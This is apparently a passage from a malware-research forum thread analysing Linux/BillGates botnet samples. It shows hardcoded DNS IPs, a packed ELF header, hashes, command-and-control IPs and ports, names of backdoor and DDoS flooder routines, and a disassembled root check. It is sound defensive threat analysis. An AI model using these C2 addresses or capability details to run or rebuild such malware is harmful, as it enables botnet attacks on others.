.rodata:0x80F47CD   0x00C C 211.95.1.97
.rodata:0x80F47D9   0x00C C 211.95.72.1
.rodata:0x80F47E5   0x00F C 211.136.112.50
.rodata:0x80F47F4   0x00F C 211.136.150.66
.rodata:0x80F4803   0x00A C 119.6.6.6
.rodata:0x80F480D   0x00F C 124.161.97.234
.rodata:0x80F481C   0x00F C 124.161.97.238
.rodata:0x80F482B   0x00F C 124.161.97.242
.rodata:0x80F483A   0x00C C 61.139.2.69
.rodata:0x80F4846   0x00D C 202.98.96.68
.rodata:0x80F4853   0x00E C 202.115.32.36
.rodata:0x80F4861   0x00E C 202.115.32.39
.rodata:0x80F486F   0x00E C 218.6.200.139
.rodata:0x80F487D   0x00D C 218.89.0.124
.rodata:0x80F488A   0x00D C 61.139.54.66
.rodata:0x80F4897   0x00D C 61.139.39.73
.rodata:0x80F48A4   0x00E C 139.175.10.20
.rodata:0x80F48B2   0x00F C 139.175.55.244
.rodata:0x80F48C1   0x00F C 139.175.150.20
.rodata:0x80F48D0   0x00F C 139.175.252.16
.rodata:0x80F48DF   0x00B C 168.95.1.1
.rodata:0x80F48EA   0x010 C 210.200.211.193
.rodata:0x80F48FA   0x010 C 210.200.211.225
.rodata:0x80F490A   0x00D C 211.78.130.1
.rodata:0x80F4917   0x00A C 61.31.1.1
.rodata:0x80F4921   0x00C C 61.31.233.1
.rodata:0x80F492D   0x00D C 168.95.192.1
.rodata:0x80F493A   0x00F C 168.95.192.174
.rodata:0x80F4949   0x00C C 61.60.224.3
.rodata:0x80F4955   0x00C C 61.60.224.5
.rodata:0x80F4961   0x00E C 202.113.16.10
.rodata:0x80F496F   0x00E C 202.113.16.11
.rodata:0x80F497D   0x00D C 202.99.96.68
.rodata:0x80F498A   0x00E C 202.99.104.68
.rodata:0x80F4998   0x00E C 211.137.160.5
.rodata:0x80F49A6   0x010 C 211.137.160.185
.rodata:0x80F49B6   0x00F C 219.150.32.132
.rodata:0x80F49C5   0x00E C 202.98.224.68
.rodata:0x80F49D3   0x00E C 211.139.73.34
.rodata:0x80F49E1   0x00C C 61.10.0.130
.rodata:0x80F49ED   0x00C C 61.10.1.130
.rodata:0x80F49F9   0x00C C 202.14.67.4
.rodata:0x80F4A05   0x00D C 202.14.67.14
.rodata:0x80F4A12   0x00D C 202.45.84.58
.rodata:0x80F4A1F   0x00D C 202.45.84.67
.rodata:0x80F4A2C   0x00D C 202.60.252.8
.rodata:0x80F4A39   0x00E C 202.85.128.32
.rodata:0x80F4A47   0x00C C 203.80.96.9
.rodata:0x80F4A53   0x00F C 203.142.100.18
.rodata:0x80F4A62   0x00F C 203.142.100.21
.rodata:0x80F4A71   0x00E C 203.186.94.20
.rodata:0x80F4A7F   0x00F C 203.186.94.241
.rodata:0x80F4A8E   0x00B C 221.7.1.20
.rodata:0x80F4A99   0x00F C 61.128.114.133
.rodata:0x80F4AA8   0x00F C 61.128.114.166
.rodata:0x80F4AB7   0x010 C 218.202.152.130
.rodata:0x80F4AC7   0x00F C 61.166.150.123
.rodata:0x80F4AD6   0x00F C 202.203.128.33
.rodata:0x80F4AE5   0x00C C 211.98.72.7
.rodata:0x80F4AF1   0x00E C 211.139.29.68
.rodata:0x80F4AFF   0x00F C 211.139.29.150
.rodata:0x80F4B0E   0x00F C 211.139.29.170
.rodata:0x80F4B1D   0x00D C 221.3.131.11
.rodata:0x80F4B2A   0x00F C 222.172.200.68
.rodata:0x80F4B39   0x00F C 61.166.150.101
.rodata:0x80F4B48   0x00F C 61.166.150.139
.rodata:0x80F4B57   0x00F C 202.203.144.33
.rodata:0x80F4B66   0x00F C 202.203.160.33
.rodata:0x80F4B75   0x00F C 202.203.192.33
.rodata:0x80F4B84   0x00F C 202.203.208.33
.rodata:0x80F4B93   0x00F C 202.203.224.33
.rodata:0x80F4BA2   0x00F C 211.92.144.161
.rodata:0x80F4BB1   0x00E C 222.221.5.240
.rodata:0x80F4BBF   0x00E C 61.166.25.129
.rodata:0x80F4BCD   0x00E C 202.96.103.36
.rodata:0x80F4BDB   0x00D C 221.12.1.227
.rodata:0x80F4BE8   0x010 C 221.130.252.200
.rodata:0x80F4BF8   0x00D C 222.46.120.5
.rodata:0x80F4C05   0x00D C 202.96.96.68
.rodata:0x80F4C12   0x010 C 218.108.248.219
.rodata:0x80F4C22   0x010 C 218.108.248.245
.rodata:0x80F4C32   0x00E C 61.130.254.34
.rodata:0x80F4C40   0x00D C 60.191.244.5
.rodata:0x80F4C4D   0x00E C 202.96.104.15
.rodata:0x80F4C5B   0x00E C 202.96.104.26
.rodata:0x80F4C69   0x00E C 221.12.33.227
.rodata:0x80F4C77   0x00E C 202.96.107.27
.rodata:0x80F4C85   0x00E C 61.128.128.68
.rodata:0x80F4C93   0x00E C 61.128.192.68
.rodata:0x80F4CA1   0x00D C 218.201.17.2
.rodata:0x80F4CAE   0x00D C 221.5.203.86
.rodata:0x80F4CBB   0x00D C 221.5.203.90
.rodata:0x80F4CC8   0x00D C 221.5.203.98
.rodata:0x80F4CD5   0x00C C 221.7.92.86
.rodata:0x80F4CE1   0x00C C 221.7.92.98
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Thu Sep 11, 2014 4:55 am

This is another Bill Gates variant.
https://www.virustotal.com/en/file/6dd9 ... 409743087/
With binary packed with the mod/custom UPX, an "ancient/outdated/stupid" trick. wrote ↑comment for "my way" to unpack..

Code: Select all

00000000 7f 45 4c 46 02 01 01 03 00 00 00 00 00 00 00 00 |.ELF............|
00000010 02 00 3e 00 01 00 00 00 80 23 10 00 00 00 00 00 |..>......#......|
00000020 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |@...............|
00000030 00 00 00 00 40 00 38 00 02 00 40 00 00 00 00 00 |....@.8...@.....|
00000040 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 |................|
00000050 00 00 10 00 00 00 00 00 00 00 10 00 00 00 00 00 |................|
00000060 54 2b 00 00 00 00 00 00 54 2b 00 00 00 00 00 00 |T+......T+......|
00000070 00 10 00 00 00 00 00 00 01 00 00 00 06 00 00 00 |................|
00000080 48 0f 00 00 00 00 00 00 48 4f 68 00 00 00 00 00 |H.......HOh.....|
00000090 48 4f 68 00 00 00 00 00 00 00 00 00 00 00 00 00 |HOh.............|
000000a0 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 |................|
000000b0 e9 93 02 47 55 50 58 21 d4 07 0d 16 00 00 00 00 |...GUPX!........|
CNC in China))

Code: Select all

IP: 61.147.103.21 , port number: 55555 
61.147.103.21||65222 | 61.147.103.21/32 | -Private |  | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK
Typical poking callback sending server sensitive information:
Callback method: PUSH.ACK:

Code: Select all

 xxxx 61.147.103.21 TCP 646 60943 > 55555 [PSH, ACK] Seq=1461 Ack=1 Win=14720 Len=592 
---
malwaremustdie.org
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Thu Sep 11, 2014 8:27 pm

Look at the below panel, this was started from August, recently spotted. thx Shibumi.
The panel:
Image

Both samples are: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
MD5 (exp24) = b165fc62f6326b18308133acfd228b58
MD5 (exp26) = c7fe5c49e40e1cd7e9d662107c7b86fb
VT = 3 | https://www.virustotal.com/en/file/393a ... 410452867/
VT = 5 | https://www.virustotal.com/en/file/3f50 ... 410453036/

typical BillGates:

Code: Select all

.rodata:0x0x080134BC2  0x0F C 12CUpdateGates
.rodata:0x0x080134BD1  0x0E C 11CUpdateBill 
.text:0x0x08005CD7C ; MainBeikong(void)
.text:0x0x08005CFBE ; MainBackdoor(void)
.text:0x0x08005D0B4 ; MainSystool(int, char **)
.text:0x0x08005C9F0 ; MainProcess(void)
.text:0x0x08005CC6A ; MainMonitor(void)
a 13 flooder...

Code: Select all

AttackIe  
AttackTns  
AttackCc  
TcpAttack  
AttackCompress 
AttackPrx  
AttackAmp  
AttackDns  
AttackIcmp 
AttackSyn  
AttackUdp  
PacketAttack
AttackBase
Just a note, this is the way used to detect root:
;; text:0x0807D46 to .text:0x0807D65

Code: Select all

_ZN8CUtility6IsRootEv 
 push    ebp
 mov     ebp, esp
 sub     esp, 8
 call    getuid  ;; seeking current user id
 mov     [ebp+var_4], eax
 cmp     [ebp+var_4], 0 ; compare is user = 0 / root
 setz    al
 movzx   eax, al
 mov     [ebp+var_4], eax
 mov     eax, [ebp+var_4]
 leave
 retn
CNC.. they use USA server for CNC)

Code: Select all

sa_family=AF_INET, sin_port=htons(25000), sin_addr=inet_addr("146.71.100.214")
exp24 25120 mmd 6u IPv4 225381560 0t0 TCP MMD-BANGS-YOU-GOOD.malwaremustdie.org:52831->146-71-100-214.static.gorillaservers.com:25000 (ESTABLISHED)
Loc: 146.71.100.214|146-71-100-214.static.gorillaservers.com.|53850 | 146.71.96.0/19 | GORILLASERVERS
You do not have the required permissions to view the files attached to this post.
Last edited by unixfreaxjp on Thu Sep 11, 2014 9:57 pm, edited 1 time in total.

Post Reply